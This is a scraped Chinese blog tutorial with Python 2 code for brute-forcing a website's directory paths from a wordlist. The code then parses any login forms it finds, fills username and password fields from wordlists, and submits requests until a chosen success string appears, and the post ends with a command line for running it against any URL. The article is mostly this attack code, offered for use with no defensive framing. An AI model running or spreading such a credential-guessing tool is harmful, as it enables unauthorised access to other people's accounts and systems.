首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

python遍历路径破解表单的示例

- Author -

Misaki''s

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python编程生成随机用户名及密码的方法示例
May 05 Python
详解Python里使用正则表达式的ASCII模式
Nov 02 Python
python实现图片处理和特征提取详解
Nov 13 Python
详谈python3中用for循环删除列表中元素的坑
Apr 19 Python
Python自定义一个类实现字典dict功能的方法
Jan 19 Python
python使用socket 先读取长度,在读取报文内容示例
Sep 26 Python
关于tf.reverse_sequence()简述
Jan 20 Python
OpenCV 表盘指针自动读数的示例代码
Apr 10 Python
matplotlib jupyter notebook 图像可视化 plt show操作
Apr 24 Python
简单了解Java Netty Reactor三种线程模型
Apr 26 Python
Django权限设置及验证方式
May 13 Python
Python使用Selenium模拟浏览器自动操作功能
Sep 08 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
主持词(345) 竞聘书(31) 委托书(259) 担保书(46) 建议书(203) 责任书(145) 意向书(73) 聘任书(31) 广告词(105) 承诺书(369)
You might like
两个php日期控制类实例
2014/12/09 PHP
PHP添加图片水印、压缩、剪切的封装类
2015/08/17 PHP
Laravel实现构造函数自动依赖注入的方法
2016/03/16 PHP
jQuery select控制插件
2009/08/17 Javascript
ExtJS 入门
2010/10/29 Javascript
Javascript 八进制转义字符(8进制)
2011/04/08 Javascript
C++中的string类的用法小结
2015/08/07 Javascript
超赞的jQuery图片滑块动画特效代码汇总
2016/01/25 Javascript
Node.js DES加密的简单实现
2016/07/07 Javascript
利用JS实现点击按钮后图片自动切换的简单方法
2016/10/24 Javascript
js实现的xml对象转json功能示例
2016/12/24 Javascript
jQuery中select与datalist制作下拉菜单时的区别浅析
2016/12/30 Javascript
JS基于递归算法实现1,2,3,4,5,6,7,8,9倒序放入数组中的方法
2017/01/03 Javascript
简单易懂的天气插件(代码分享)
2017/02/04 Javascript
ES6新特性之变量和字符串用法示例
2017/04/01 Javascript
前端主流框架vue学习笔记第二篇
2017/07/26 Javascript
微信小程序上传图片到服务器实例代码
2017/11/07 Javascript
jquery传参及获取方式(两种方式)
2020/02/13 jQuery
Element Popover 弹出框的使用示例
2020/07/26 Javascript
[00:16]热血竞技场
2019/03/06 DOTA
Python3生成手写体数字方法
2018/01/30 Python
浅谈python脚本设置运行参数的方法
2018/12/03 Python
使用pandas实现csv/excel sheet互相转换的方法
2018/12/10 Python
pandas.cut具体使用总结
2019/06/24 Python
详解使用postMessage解决iframe跨域通信问题
2019/11/01 HTML / CSS
决定成败的关键——创业计划书
2014/01/24 职场文书
激情洋溢的毕业生就业求职信
2014/03/15 职场文书
社区爱国卫生月活动总结
2014/06/30 职场文书
2014年教务工作总结
2014/12/03 职场文书
四年级学生期末评语
2014/12/26 职场文书
2015年学校安全管理工作总结
2015/05/11 职场文书
公文写作指导之倡议书!
2019/07/03 职场文书
go语言基础 seek光标位置os包的使用
2021/05/09 Golang
JavaScript原始值与包装对象的详细介绍
2021/05/11 Javascript
详解Python flask的前后端交互
2022/03/31 Python
Ruby序列化和持久化存储 Marshal和Pstore介绍
2022/04/18 Ruby